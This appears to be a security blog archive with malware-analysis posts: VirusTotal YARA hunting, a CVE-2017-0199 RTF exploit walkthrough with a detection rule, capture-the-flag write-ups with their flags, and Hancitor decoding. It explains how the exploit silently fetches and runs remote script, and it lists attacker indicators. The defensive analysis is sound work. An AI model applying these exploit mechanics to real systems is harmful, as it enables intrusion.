Hunting malware with metadata

A while ago, Michel wrote a blog post titled Tracking threat actors through .LNK files.

In this post, we want to illustrate how VirusTotal (retro) hunting can be leveraged to extract malware samples and metadata linked to a single threat actor. We use the power of YARA rules to pinpoint the metadata we are looking for.

With some of the metadata extracted from the .LNK file we wrote about in our previous blog post (Volume ID and MAC address), we’re going to search on VirusTotal for samples with that metadata. It is clear from the MAC address 00:0C:29:5A:39:04 that the threat actor used a virtual machine to build malware: 00:0C:29 is an OUI owned by VMware. We wonder if the same VM was used to create other samples.
With a VirusTotal Intelligence subscription, one can search through the VirusTotal sample database, for example with YARA rules. We use the following YARA rule for the metadata:

rule MALDOC_LNK {
 strings:
  $BirthObjectId = {C2 CC 13 98 18 B9 E2 41 82 40 54 A8 AD E2 0A 9A}
  $MACAddress = {00 0C 29 5A 39 04}
 condition:
  all of them
}

VTI supports hunting and retro-hunting with YARA rules. With hunting, you are notified each time a newly submitted sample matches one of your YARA rules on the VT servers. With retro-hunting, YARA rules are used to scan through 75TB of samples in the VT database. This corresponds more or less to the set of samples submitted in the last three months.
Here is the result from a retro-hunt using YARA rule MALDOC_LNK:

The next step is to download and analyse all these samples. Since we did not include a file type condition in our YARA rule, we get different types of files: Word .doc files, .lnk files, raw OLE streams containing .lnk files, and MIME files (e-mails with Word documents as attachments).
With this command we search for strings containing “http” in the samples:
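The command's output is not reproduced in this post. As a rough stand-in, here is a minimal Python sketch that pulls printable ASCII and UTF-16LE strings containing "http" out of a sample. The 4-character minimum and the helper name `http_strings` are our own assumptions. They are not part of any tool used in this post.

```python
import re

# Printable ASCII runs of at least 4 characters.
ASCII_RE = re.compile(rb"[\x20-\x7e]{4,}")
# The same, UTF-16LE encoded: each printable character followed by a zero byte.
UTF16_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")


def http_strings(data: bytes) -> list[str]:
    """Return ASCII and UTF-16LE strings in data that contain 'http' (any case)."""
    found = [m.group().decode("ascii") for m in ASCII_RE.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in UTF16_RE.finditer(data)]
    return [s for s in found if "http" in s.lower()]
```

To get a quick list of candidate URLs, run `http_strings(open(path, "rb").read())` on each downloaded sample. The helper does not decompress anything, so URLs inside compressed data will be missed.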

So we see that the same virtual machine has been used to create several samples. Here we extract the commands launched via the .lnk files:

There are 2 types of commands: downloading one executable; and downloading one executable and a decoy document.

The metadata from the OLE files reveals that the virtual machine has been used for a couple of weeks:


With metadata and VirusTotal, it is possible to identify samples created by the same actor over a period of 3 months. These samples can provide new metadata and IOCs.

Analysis of a CVE-2017-0199 Malicious RTF Document

There is a new exploit (CVE-2017-0199) going around, for which Microsoft released a patch on 11 April 2017. In this post, we analyze an RTF document exploiting this vulnerability and provide a YARA rule for detection.

rtfdump.py is a Python tool to analyze RTF documents. Running it on our sample produces a list of all “entities” in the RTF document (text enclosed between {}):

This is often a huge list with a lot of information. But here, we are interested in OLE 1.0 objects embedded within this RTF file. We can use the filter with option -f O for such objects:

There are 2 entities (objdata and datastore) with indices 153 and 249 (this is a number generated by rtfdump; it is not part of the RTF code). The content of an object is encoded with hexadecimal characters in an RTF file; entity 153 contains 5448 hexadecimal characters. So let’s take a look by selecting this entity for deeper analysis with option -s 153:

In this hex/ascii dump, we can see that the text starts with 01050000 02000000, indicating an OLE 1.0 object. As the second line starts with d0cf11e0, we can guess it contains an OLE file.
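Both checks are easy to reproduce. Below is a minimal Python sketch. It assumes we already have the hexadecimal text of the objdata entity, for example as selected with rtfdump's -s option. It also assumes that text contains nothing but hex digits and whitespace. `describe` is a hypothetical helper.

```python
# OLE 1.0 header: version 0x00000501 and format ID 2 (embedded), both little-endian.
OLE1_HEADER = bytes.fromhex("0105000002000000")
# Signature of an OLE (compound) file.
OLE2_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")


def describe(objdata_hex: str) -> dict:
    """Decode the hex text of an objdata entity and report what it looks like."""
    data = bytes.fromhex("".join(objdata_hex.split()))  # drop spaces and line breaks
    return {
        "ole1_embedded": data.startswith(OLE1_HEADER),
        "ole2_offset": data.find(OLE2_MAGIC),  # -1 when no OLE file is found
        "size": len(data),
    }
```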

With option -H, we can convert the hexadecimal characters to binary:

Now we can see the string OLE2Link, which has often been referred to when talking about this zero-day. With option -i, we can get more information about the embedded object:

So it is clearly an embedded OLE file, and the name OLE2Link followed by a zero byte was chosen to identify this embedded OLE file. With option -E, we can extract the embedded object:

Since this is an OLE file, we can analyze it with oledump.py: we dump the file with option -d and pipe it into oledump.py:

The OLE file contains 2 streams. Let’s take a look at the first stream:

We can recognize a URL; let’s extract it with strings:

Because of vulnerability CVE-2017-0199, this URL will automatically be downloaded. The web server serving this document identifies it as an HTA file via a Content-Type header:

Because this download is performed by the URL Moniker, this moniker will recognize the content-type and open the downloaded file with Microsoft’s HTA engine. The downloaded HTA file might look to us like an RTF file, but the HTA parser will find the VBS script and execute it:

This VBS script performs several actions, ultimately downloading and executing a malicious executable.


Let’s take a second look at the first stream in the OLE file (the stream with the malicious URL):

The byte sequence that we selected here (E0 C9 EA 79 F9 BA CE 11 8C 82 00 AA 00 4B A9 0B) is the binary representation of the URL Moniker GUID: {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}. Notice that the byte order of the binary sequence and the text representation of the GUID is partially reversed. This is typical for GUIDs, whose first three fields are stored in little-endian byte order.
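Python's standard uuid module can show this byte-order conversion. `UUID.bytes_le` stores the first three GUID fields little-endian, as Windows does, and leaves the last 8 bytes untouched. A minimal sketch:

```python
import uuid

URL_MONIKER_CLSID = "79EAC9E0-BAF9-11CE-8C82-00AA004BA90B"

# Data1, Data2 and Data3 are byte-swapped; the last 8 bytes keep their order.
as_stored = uuid.UUID(URL_MONIKER_CLSID).bytes_le
print(as_stored.hex(" ").upper())  # E0 C9 EA 79 F9 BA CE 11 8C 82 00 AA 00 4B A9 0B
```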

After the URL Moniker GUID, there is a length field, followed by the malicious URL (and then followed by a file closing sequence, …).
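Following that layout, a minimal Python sketch for extracting the URL from the raw stream could look like this. It makes two assumptions:

- The length field is a 32-bit little-endian integer counting the bytes that follow it.
- The URL is a zero-terminated UTF-16LE string, and whatever follows the terminator is ignored.

`extract_moniker_url` is our own hypothetical helper.

```python
import struct
import uuid
from typing import Optional

# URL Moniker CLSID in on-disk (partially little-endian) byte order.
URL_MONIKER = uuid.UUID("79EAC9E0-BAF9-11CE-8C82-00AA004BA90B").bytes_le


def extract_moniker_url(stream: bytes) -> Optional[str]:
    """Return the URL stored after the URL Moniker GUID, or None if absent."""
    pos = stream.find(URL_MONIKER)
    if pos < 0:
        return None
    pos += len(URL_MONIKER)
    (length,) = struct.unpack_from("<I", stream, pos)  # assumed 32-bit LE length
    body = stream[pos + 4 : pos + 4 + length]
    # Stop at the first UTF-16 NUL character (two zero bytes at an even offset).
    for i in range(0, len(body) - 1, 2):
        if body[i] == 0 and body[i + 1] == 0:
            body = body[:i]
            break
    return body.decode("utf-16-le", errors="replace")
```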

We use the following YARA rule to hunt for these RTF documents:

rule rtf_objdata_urlmoniker_http {
 strings:
  $header = "{\\rtf1"
  $objdata = "objdata 0105000002000000" nocase
  $urlmoniker = "E0C9EA79F9BACE118C8200AA004BA90B" nocase
  $http = "68007400740070003a002f002f00" nocase
 condition:
  $header at 0 and $objdata and $urlmoniker and $http
}

Remark 1: we do not search for string OLE2Link

Remark 2: with a bit of knowledge of the RTF language, it is trivial to modify documents to bypass detection by this rule

Remark 3: the search for http:// (string $http) is case sensitive: nocase only makes the hexadecimal digits case-insensitive, so HTTP:// will not match. It will not trigger on https:// either. If you want, you can omit this string.

Remark 4: there is no test for the order in which these strings appear
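To make the rule's strings less opaque, here is a rough Python equivalent of its condition. It derives $urlmoniker and $http from what they encode: the GUID in on-disk byte order, and http:// in UTF-16LE, both written as hex text. It emulates nocase by lowercasing the document. This is a sketch for understanding the rule, not a replacement for YARA.

```python
import uuid

OBJDATA = b"objdata 0105000002000000"
# GUID bytes in on-disk order, as lowercase hex text.
URLMONIKER = uuid.UUID("79EAC9E0-BAF9-11CE-8C82-00AA004BA90B").bytes_le.hex().encode()
# "http://" in UTF-16LE as hex text: b"68007400740070003a002f002f00".
HTTP = "http://".encode("utf-16-le").hex().encode()


def rule_matches(rtf: bytes) -> bool:
    """Rough equivalent of the YARA condition (string order is not checked)."""
    lowered = rtf.lower()  # emulates nocase for the three hex-text strings
    return (
        rtf.startswith(b"{\\rtf1")  # $header at 0, case sensitive
        and OBJDATA in lowered
        and URLMONIKER in lowered
        and HTTP in lowered
    )
```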

Happy hunting!

CSCBE Challenge Write-up – Sufbo

The Sufbo challenge was tackled during the Cyber Security Challenge qualifiers and proved to be very difficult to solve. This write-up gives you a possible way of solving it!


All challenges of the Cyber Security Challenge are created by security professionals from many different organisations. The Sufbo challenge in particular was created by Adriaan Dens, one of our distinguished challenge contributors, from Proximus. Adriaan & Proximus have contributed multiple challenges over the years and they tend to be pretty hard to solve ;).

The challenge

And you thought Assembly was hard to read? Try this!

The solution

The challenge consists of a heavily obfuscated piece of Perl code. We can start by cleaning up the code, which improves its readability slightly:

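print"Flag: "; chomp($_=<>);
$[=0; die if y///c!=32;
chomp(@_=<DATA>);
$/=join'',map{chr(ord$_^$=)}split//,pack"H*",shift(@_).shift(@_);
while($,=substr$_,8*$-,8) {
    ($@,$*,$#,$x,$y,$z,$!,$.,$,) = (unpack("N*",$/.$,),0,2**31*(sqrt(5)-1),(1<<32)-1);
    map {
        $!+=$.; $!&=$,;
        $y+=((((($z<<4)&$,)+$@)&$,)^(($z+$!)&$,)^((($z>>5)+$*)&$,)); $y&=$,;
        $z+=((((($y<<4)&$,)+$#)&$,)^(($y+$!)&$,)^((($y>>5)+$x)&$,)); $z&=$,;
        $"=pack("N*",$y,$z); $/=$"x2
    }0..31;
    die if$"ne pack"H*",$_[$-];
    $-++;
}
print "OK\n"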


This code might still not mean a lot to the average non-perl-speaking-person. Let’s take a look at the same code, but with some inline comments:

print"Flag: "; # Prints "Flag: " to STDOUT
chomp($_=<>); # Reads in the input into the variable $_
$[=0; # Changes the starting index of an array to 0 (It's a useless command actually)
die if y///c!=32; # y///c is a Perl golfing idiom similar to length($_), so your input has to be exactly 32 characters long.
chomp(@_=<DATA>); # Store the data below (under __DATA__) in the array @_
$/=join'',map{chr(ord$_^$=)}split//,pack"H*",shift(@_).shift(@_); # Shift the first two elements of @_, "unhexify" the strings, split them per character, XOR with $= (default value is 60), and join the characters back in the variable $/.
while($,=substr$_,8*$-,8) { # While there are 8 characters left in the input do:
($@,$*,$#,$x,$y,$z,$!,$.,$,) = (unpack("N*",$/.$,),0,2**31*(sqrt(5)-1),(1<<32)-1); # Convert the key $/ and the current 8-character input block $, to unsigned 32-bit numbers ($@,$*,$#,$x for the key; $y,$z for the input), assign 0 to $!, assign 2**31*(sqrt(5)-1) to $. and assign (1<<32)-1 to $,.
map { # Use map to loop 32 times (see below)
$!+=$.; # Add $. to $!
$!&=$,; # Bitwise AND $! with $,
$y+=((((($z<<4)&$,)+$@)&$,)^(($z+$!)&$,)^((($z>>5)+$*)&$,)); # Some bitwise operations added to $y
$y&=$,; # Bitwise AND $y with $,
$z+=((((($y<<4)&$,)+$#)&$,)^(($y+$!)&$,)^((($y>>5)+$x)&$,)); # Some bitwise operations added to $z
$z&=$,; # Bitwise AND $z with $,
$"=pack("N*",$y,$z); # Convert the unsigned numbers back to string representation
$/=$"x2 # Set $/ to $" repeated twice: this ciphertext becomes the key for the next block
}0..31; # Use map to loop 32 times
die if$"ne pack"H*",$_[$-]; # Die if $" is not equal to the "unhexified" element ($- contains the index) in @_
$-++; # Increase the variable $-
} #
print "OK\n" # Printed if you have the key
__DATA__ # Starting the DATA block (kinda like a here document)
6c594e50630d4f63 # First half of the encoded key, used to build $/ (the $/=join... line).
7d515d4655525b1d # Second half of the encoded key, used to build $/ (the $/=join... line).
7872575285c742da # Expected ciphertext of the 1st input block (checked by the "die if ... ne" line).
15c670798094a00b # Expected ciphertext of the 2nd input block (checked by the "die if ... ne" line).
54f08c6b937ed1f2 # Expected ciphertext of the 3rd input block (checked by the "die if ... ne" line).
6810afed7372cd76 # Expected ciphertext of the 4th input block (checked by the "die if ... ne" line).

So now we more or less know what each line does but we still miss context on a higher level (what it is doing). As always in reverse engineering, you try to find some “known parts” which allow you to understand the code a lot faster. These parts are usually strings, metadata, fixed numbers or familiar code blocks.

In our case, we have 2 fixed numbers: 2**31*(sqrt(5)-1) and (1<<32)-1. In this representation they don’t mean much but if we convert them to hex numbers we get 0x9e3779b9 and 0xffffffff respectively.
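The conversion is easy to reproduce, for example in Python:

```python
import math

delta = int(2**31 * (math.sqrt(5) - 1))  # truncated, as the Perl bitwise AND does
mask = (1 << 32) - 1

print(hex(delta), hex(mask))  # 0x9e3779b9 0xffffffff
```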

Let’s see if our old friend Google knows more about this.


Hmm, interesting! Seems like we’ve got a Perl implementation of Tiny Encryption Algorithm (TEA) on our hands here!

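More specifically, the while loop block in the code is the actual TEA implementation. It encrypts each 8-character block of our input and compares the result with the last four lines of the __DATA__ section. The first block is encrypted with a key derived from the first two lines of __DATA__; every following block uses the previous ciphertext block, repeated twice, as its key.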
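To double-check this reading of the Perl code, here is a Python restatement of the check it performs. It assumes the input is ASCII. `tea_encrypt` is standard TEA encryption. `check_flag` and its key chaining are our own transcription of the while loop, not code from the challenge.

```python
import struct

MASK = 0xFFFFFFFF
DELTA = 0x9E3779B9  # 2**31*(sqrt(5)-1), truncated

# The six __DATA__ lines of the challenge.
DATA = [
    "6c594e50630d4f63", "7d515d4655525b1d",  # XOR-encoded first key
    "7872575285c742da", "15c670798094a00b",  # expected ciphertext, blocks 1-2
    "54f08c6b937ed1f2", "6810afed7372cd76",  # expected ciphertext, blocks 3-4
]


def tea_encrypt(v0, v1, k):
    """Standard 32-round TEA encryption of one 64-bit block (two 32-bit words)."""
    s = 0
    for _ in range(32):
        s = (s + DELTA) & MASK
        v0 = (v0 + ((((v1 << 4) + k[0]) ^ (v1 + s) ^ ((v1 >> 5) + k[1])) & MASK)) & MASK
        v1 = (v1 + ((((v0 << 4) + k[2]) ^ (v0 + s) ^ ((v0 >> 5) + k[3])) & MASK)) & MASK
    return v0, v1


def check_flag(flag: str) -> bool:
    data = flag.encode()
    if len(data) != 32:  # die if y///c!=32
        return False
    # $/: unhexify the first two lines and XOR every byte with $= (60)
    key_bytes = bytes(b ^ 60 for b in bytes.fromhex(DATA[0] + DATA[1]))
    key = struct.unpack(">4I", key_bytes)  # unpack "N*" = big-endian 32-bit words
    for i, expected in enumerate(DATA[2:]):
        v0, v1 = struct.unpack(">2I", data[8 * i : 8 * i + 8])
        cipher = struct.pack(">2I", *tea_encrypt(v0, v1, key))
        if cipher != bytes.fromhex(expected):  # die if $" ne pack "H*", ...
            return False
        key = struct.unpack(">4I", cipher * 2)  # $/ = $" x 2
    return True
```

Since each key depends only on the expected ciphertext, the blocks can be decrypted independently once the first key is known.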

Retrieving the key can be done using the following perl one-liner:

perl -E 'say join"",map{chr(ord$_^$=)}split//,pack"H*","6c594e50630d4f637d515d4655525b1d"'

Which yields us “Perl_1s_Amazing!” as the key.

So now we have the key and the data to be decrypted. Let’s be lazy and copy the reference code listed on the Wikipedia page we found earlier.


#include <inttypes.h>
#include <stdio.h>

void decrypt (uint32_t* v, const uint32_t* k) {
    uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i; /* set up; sum = delta * 32 */
    uint32_t delta=0x9e3779b9; /* a key schedule constant */
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */
    for (i=0; i<32; i++) { /* basic cycle start */
        v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
        v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
        sum -= delta;
    } /* end cycle */
    v[0]=v0; v[1]=v1;
    printf("%08" PRIx32 "%08" PRIx32, v0, v1); /* print the plaintext block as hex */
}

int main(void) {
    /* Our cipher chunks, found in the __DATA__ block of the Perl code */
    uint32_t c0[] = { 0x78725752, 0x85c742da };
    uint32_t c1[] = { 0x15c67079, 0x8094a00b };
    uint32_t c2[] = { 0x54f08c6b, 0x937ed1f2 };
    uint32_t c3[] = { 0x6810afed, 0x7372cd76 };

    /* The keys used for encrypting */
    uint32_t k[] = { 0x5065726c, 0x5f31735f, 0x416d617a, 0x696e6721 }; /* Original key: Perl_1s_Amazing! */
    uint32_t k0[] = { 0x78725752, 0x85c742da, 0x78725752, 0x85c742da }; /* c0 . c0 */
    uint32_t k1[] = { 0x15c67079, 0x8094a00b, 0x15c67079, 0x8094a00b }; /* c1 . c1 */
    uint32_t k2[] = { 0x54f08c6b, 0x937ed1f2, 0x54f08c6b, 0x937ed1f2 }; /* c2 . c2 */

    /* Decrypting the chunks: each block was encrypted with the previous ciphertext block (doubled) as key */
    decrypt(c0, k);
    decrypt(c1, k0);
    decrypt(c2, k1);
    decrypt(c3, k2);
    printf("\n");
    return 0;
}

$ gcc --std=c99 solution.c
$ ./a.out
$ ./a.out | perl -nle 'print pack("H*", $_)'
CSCBE{Perl1sWr1te0nceRe4dn3veRr}

There we go! CSCBE{Perl1sWr1te0nceRe4dn3veRr} was the flag.

Tracking threat actors through .LNK files

In the blog post .LNK downloader and bitsadmin.exe in malicious Office document we were asked the following question by Harlan Carvey:

Did you parse the LNK file for things such as embedded MAC address, NetBIOS system name, any SID, and volume serial number?

We did not do that at the time; however, we see the value in doing so to track specific threat actors across different campaigns.

The Windows .LNK file format contains valuable information that is specific to the host on which the .LNK file was created, including:

  • The MAC address of the host;
  • The NetBIOS system name;
  • The volume serial number.

This is all information that will not easily be changed on the threat actor’s workstation and which should be fairly unique.

For more information on the .LNK file format, take a look at the following ForensicWiki page:

I used the tool lnkanalyser from woanware to analyse the extracted .LNK file.


Now, what information are we seeing here?

NOTE: this tool does not show the relative path, although it was shown for other .LNK files we tested. This particular .LNK file’s relative path refers to cmd.exe in the C:\Windows\System32 folder.

The first thing that stands out is the argument: this is everything that is passed on the command line. It has been discussed in the blog post .LNK downloader and bitsadmin.exe in malicious Office document.

The next interesting item is the Target Metadata. The timestamps shown here are those of the target executable (in this case cmd.exe) on the system of the person who created this .LNK file.

In conclusion, we have four artefacts tied to the workstation on which this .LNK file was created that can be used to track a threat actor:

  • Hard disk serial number: 60BDBF2D
  • Volume ID: C2CC139818B9E241824054A8ADE20A9A
  • Machine ID: 123-¯ª
  • MAC address: 00:0C:29:5A:39:04
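A related detail explains why the MAC address can be searched for as raw bytes. We assume, as is common for .LNK tracker data, that the MAC address comes from the node field of a version-1 (time-based) object ID GUID. The on-disk form of such a GUID ends with those 6 bytes unchanged. The minimal Python sketch below extracts the MAC from such a GUID and checks it against the VMware OUI 00:0C:29. The helper names are hypothetical.

```python
import uuid

VMWARE_OUI = "00:0C:29"  # the OUI discussed here; VMware owns other OUIs too


def mac_from_object_id(guid_bytes_le: bytes) -> str:
    """Return the node field of a version-1 GUID (as stored on disk) as a MAC address."""
    u = uuid.UUID(bytes_le=guid_bytes_le)
    if u.version != 1:
        raise ValueError("not a version-1 (time-based) GUID")
    return ":".join(f"{b:02X}" for b in u.node.to_bytes(6, "big"))


def is_vmware(mac: str) -> bool:
    return mac.upper().startswith(VMWARE_OUI)
```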


Didier Stevens created a comprehensive screencap on how to extract the .LNK file from the Word document and analyze it with lnkanalyzer.exe:


For an extensive explanation of .LNK file attributes, we’d like to refer you to the following research:

CSCBE Challenge Write-up – Trace Me

This is the first post in a series of write-ups on some of the challenges that were tackled by students during our Cyber Security Challenge Belgium this month.


All challenges of the Cyber Security Challenge Belgium are created by security professionals from many different organisations. The TraceMe challenge in particular was created by Vasileios Friligkos, one of our distinguished challenge contributors.

The challenge

At your day job, per your recommendation and after many requests, you recently activated host based monitoring using Sysmon.

Perfect! You are now going to have visibility on each host of your IT system, giving you perfect awareness and detection capabilities that will be able to thwart even the most persistent attackers…
Before you can finish your thoughts, you get interrupted by a phone call:
“Steve”, (yes, this is you) says an irritated voice on the other side of the line.
– “Yes…”, replies Steve (yep, still you).
“Your awesome monitoring system did not work, we got an infection.”
– “But there are no detection rules implemented yet, it’s normal that we didn’t… “, you start explaining when you get interrupted.
“At least, tell me you can identify how the infection occurred!”
Eh, yes sure I can…

And by that, the irritated voice (who by the way is your boss) hangs up and sends you one file with the Sysmon log data of the infected host.

Can you identify the benign (non malicious) process that was abused and was ultimately responsible for the infection?
Can you also identify the IP from where the second stage was downloaded (the first connection made by the malware)?

If so, you will be able to save your reputation and also get the points for this challenge by submitting the SHA1 of the abused, benign process (Uppercase) + the IP where the second stage is hosted.

Good luck Steve!

The solution

The file is in EVTX, the Windows event log file format, which makes sense since Sysmon writes to the “Applications and Services Logs/Microsoft/Windows/Sysmon/Operational” event log, as indicated here:

There are many ways to start interacting with these events; there is even an official Microsoft tool, Log Parser, that can query event log data.
If we go this way, we have to download Log Parser and run the following command to extract all logs in CSV format:

$> LogParser.exe -i:EVT -o:csv "SELECT * from sysmon.evtx" > sysmon.csv

This gives us a .csv file with 3,021 log lines of different sizes and types.
By checking the description of Sysmon on the MS site we see that the following types of events can be logged:

  • Event ID 1: Process creation
  • Event ID 2: A process changed a file creation time
  • Event ID 3: Network connection
  • Event ID 4: Sysmon service state changed
  • Event ID 5: Process terminated
  • Event ID 6: Driver loaded
  • Event ID 7: Image loaded
  • Event ID 8: CreateRemoteThread
  • Event ID 9: RawAccessRead
  • Event ID 10: ProcessAccess
  • Event ID 11: FileCreate
  • Event ID 12: RegistryEvent (Object create and delete)
  • Event ID 13: RegistryEvent (Value Set)
  • Event ID 14: RegistryEvent (Key and Value Rename)
  • Event ID 15: FileCreateStreamHash
  • Event ID 255: Error

Ok, many interesting events that we could use. In the file, we see events of the following types: 1, 2, 3, 5 and 6.
Since we do not have any initial information to start from and then pivot back to the initial infection, we need to search for abnormal or at least unusual behaviour.

For example, we see that there is only one event ID 6, but by investigating the name of the driver and its hash we realise that it concerns a legitimate driver.

Since there are not that many logs, we could use Excel to try and make sense of them, for example by colouring the log lines based on the event ID.

If we zoom out and simply scroll over the logs, we see a burst of network activity at some point:


By investigating further, we see that there are many UDP requests to port 6892 by a “roaming.exe” process found in “C:\Users\TestPC\AppData\”, with adjacent destination IPs in the same subnet:


This certainly looks suspicious and we could take this lead for our investigation. But let’s say that we don’t go this way (Steve doesn’t like Excel) and we prefer to put our ninja awk skills to use!

Some parsing is necessary, since the comma is the field separator but also appears inside the fields, and there is a lot of useless information that we can drop.
In this case, let’s substitute the field separator with the pipe (“|”) so that we can use awk easily. Let’s also separate the process creation events (event ID 1, file sysmon_process_creation.csv) and the connection events (event ID 3, file sysmon_connections.csv).
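The same preprocessing can be done without worrying about commas inside fields by letting a real CSV parser do the splitting. Below is a minimal Python sketch with several assumptions:

- The Log Parser export has a header row with an EventID column.
- Stray pipes inside fields are replaced with slashes.
- The helper name `split_by_event` is hypothetical.

The field selection used in this post is not reproduced.

```python
import csv
import io


def split_by_event(csv_text: str, wanted=("1", "3")) -> dict[str, list[str]]:
    """Re-emit rows as '|'-separated lines, grouped by EventID.

    csv.reader handles commas inside quoted fields, which is exactly what
    breaks a naive comma split on this export."""
    rows = csv.reader(io.StringIO(csv_text))
    header = next(rows)
    col = header.index("EventID")  # assumed column name in the export
    out = {eid: [] for eid in wanted}
    for row in rows:
        if row and row[col] in out:
            # A pipe inside a field would break awk -F "|", so replace it.
            out[row[col]].append("|".join(f.replace("|", "/") for f in row))
    return out
```

Writing `out["1"]` and `out["3"]` to sysmon_process_creation.csv and sysmon_connections.csv gives files the awk commands below can consume. The field numbers ($3, $13, $15) depend on which columns you keep.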

For process creation, we keep the following fields:


Let’s filter the data and search for some unusual execution locations or uncommon process names:

awk -F "|" '{ print "Process:"$3 }' sysmon_process_creation.csv | sort | uniq -c | sort -rn


We see two executables from the %AppData% directory:

  • “Roaming.ExE”
  • “OneDrive.exe”

We can pull their SHA1 hashes and check online whether they are legitimate. Doing so does not clearly reveal whether either of them is malicious.

If we look at their parent processes:

  • “Roaming.ExE” -> powershell and roaming.exe
  • “OneDrive.exe” -> explorer

Hmm, powershell could be worth investigating; let’s also show the full command line of the parent process:


Ok, this surely looks bad: powershell launched a hidden download of an executable which was also executed at the end of the command.
So, at last, we have our investigation lead: roaming.exe

Alternatively, we could have used the connections log file to help us spot outliers.
By sorting and counting unique occurrences of processes and target IPs (similar to what we did for the process creation logs), we do not get a clear result, because too many chrome.exe processes reach out to multiple IPs:

awk -F "|" '{ printf "Process: %-90s DST:%s:%s\n",$3,$13,$15 }' sysmon_connections.csv | sort | uniq -c | sort -rn


But if we ignore the destination IP and focus only on the destination port, then we should have a clearer view:

awk -F "|" '{ printf "Process: %-90s DST_Port:%s\n",$3,$15 }' sysmon_connections.csv | sort | uniq -c | sort -rn


Roaming.exe communicated 1,088 times over UDP port 6892; searching online for this port leads directly to the Cerber malware.
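For readers who prefer Python to awk, the count-and-sort pipeline above boils down to a Counter. A minimal sketch, assuming the pipe-separated connection file described earlier. The process is in field 3 and the destination port in field 15, numbered from 1 as in awk.

```python
from collections import Counter


def count_process_ports(lines, proc_field=3, port_field=15):
    """Python take on: awk -F '|' '{print $3, $15}' | sort | uniq -c | sort -rn."""
    counts = Counter()
    for line in lines:
        fields = line.rstrip("\n").split("|")
        if len(fields) >= max(proc_field, port_field):
            counts[(fields[proc_field - 1], fields[port_field - 1])] += 1
    return counts.most_common()  # highest counts first
```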

In both cases, we have roaming.exe which looks malicious and by following its parent process PID we can trace the activities and the initial infection:

  • Roaming.exe PID: 1868 was created by powershell.exe PID: 2076
  • Powershell.exe PID: 2076 was created by cmd.exe PID: 2152

(We notice that there are two processes with the same PID 2152, “cmd.exe” and “Acrobat Reader DC\Reader\reader_sl.exe”; keep in mind that PIDs can be reused.)

  • Cmd.exe PID: 2152 was created by winword.exe PID: 2232

The parent of winword.exe is explorer.exe, which is legitimate. Therefore, we can deduce that winword.exe was abused (probably by a macro) and resulted in executing a cmd.exe command that launched a powershell command to fetch the second stage malware (probably Cerber, according to OSINT).
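Walking up the parent chain by hand gets error-prone once PIDs are reused, as with PID 2152 above. Here is a minimal Python sketch of the idea. For each parent PID, it picks the most recent process creation event with that PID that happened strictly before the child was created.

The `Proc` record, the sortable timestamp strings and the helper names are assumptions for illustration. Real Sysmon event ID 1 records carry these values as UtcTime, ProcessId, Image and ParentProcessId. They also carry ProcessGuid and ParentProcessGuid, which sidestep PID reuse when available.

```python
from typing import NamedTuple, Optional


class Proc(NamedTuple):
    time: str   # creation time as a sortable string, e.g. Sysmon's UtcTime
    pid: int
    image: str
    ppid: int


def find_creator(events: list, pid: int, before: str) -> Optional[Proc]:
    """Most recent creation event for `pid` strictly before `before` (PIDs get reused)."""
    candidates = [e for e in events if e.pid == pid and e.time < before]
    return max(candidates, key=lambda e: e.time, default=None)


def ancestry(events: list, pid: int, seen_at: str) -> list:
    """Follow parent PIDs upwards from the process `pid` observed at `seen_at`."""
    chain = []
    proc = find_creator(events, pid, seen_at)
    while proc is not None:
        chain.append(f"{proc.image} ({proc.pid})")
        proc = find_creator(events, proc.ppid, proc.time)  # parent must be older
    return chain
```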

Therefore, the first part to the solution is the SHA1 of winword.exe:

  • CE3538D04AB531F0526C4C6B1917A7BE6FF59938

For the second part, we need to identify the IP of the site from which the second stage was downloaded.
From the powershell command, we know that the download URL points to footarepu[.]top. Instead of resolving the domain name (its IP might have changed since the infection), we can find the IP in sysmon_connections.csv, since it records the PID and process name of every connection.
Searching for powershell.exe PID: 2076 we find one contacted IP over port 80:


which is the second part of the solution.

Flag: CE3538D04AB531F0526C4C6B1917A7BE6FF59938_35.165.86.173

Good job Steve!

New Hancitor maldocs keep on coming…

Didier Stevens will provide NVISO training on malicious documents at Brucon Spring: Malicious Documents for Blue and Red Teams.

For more than half a year now, we have been seeing malicious Office documents delivering Hancitor malware via a combination of VBA, shellcode and an embedded executable. The VBA code decodes and executes the shellcode; the shellcode hunts for the embedded executable, decodes it and executes it.

From the beginning, the embedded executable was encoded with a bit more complexity than a simple XOR operation. Here in the shellcode, we see that the embedded executable is decoded by adding 3 to each byte and XORing it with 17. The result is then base64-decoded, which yields the EXE.
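A minimal Python sketch of this decoding step, assuming the encoded blob has already been cut out of the document. The post does not say whether 17 is decimal or hexadecimal, so the XOR key is a parameter. Passing a 2- or 4-byte key also covers the WORD and DWORD variants discussed later in this post. `hancitor_decode` is a hypothetical helper, not the shellcode's actual code.

```python
import base64


def hancitor_decode(blob: bytes, add: int, xor_key: bytes) -> bytes:
    """Add `add` to every byte (mod 256), XOR with a repeating key, then base64-decode."""
    stage = bytes(
        ((b + add) & 0xFF) ^ xor_key[i % len(xor_key)] for i, b in enumerate(blob)
    )
    return base64.b64decode(stage)
```

For the scheme described above, the call would be `hancitor_decode(blob, 3, bytes([17]))`.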


The gang behind Hancitor steadily delivered new maldocs without changing much in this encoding method, until about 2 months ago, when we started to see samples where the XOR key was a WORD (2 bytes) instead of a single byte.

Recently we received a sample that changed the encoding of the embedded executable again. This sample still uses macros, shellcode and an embedded executable:


The encoded shellcode is still in a form (stream 16), and the embedded executable is still in data (stream 5), appended after a PNG image:


If we look at the embedded executable, we see that the pattern has changed: in the beginning, we see a pattern of 4 repeating bytes. This is a strong indication that the group started to adopt a DWORD (4 bytes) key:


We can try to recover the XOR key with a known-plaintext attack: up until now, the embedded executables were base64-encoded and started with TVqQAA… Let’s use xor-kpa to try to recover the key:


We still find no key after trying out all add values between 1 and 16. Could it be that this time, it is just XOR encoded without addition? Let’s try:


Indeed! The key is xP4?.
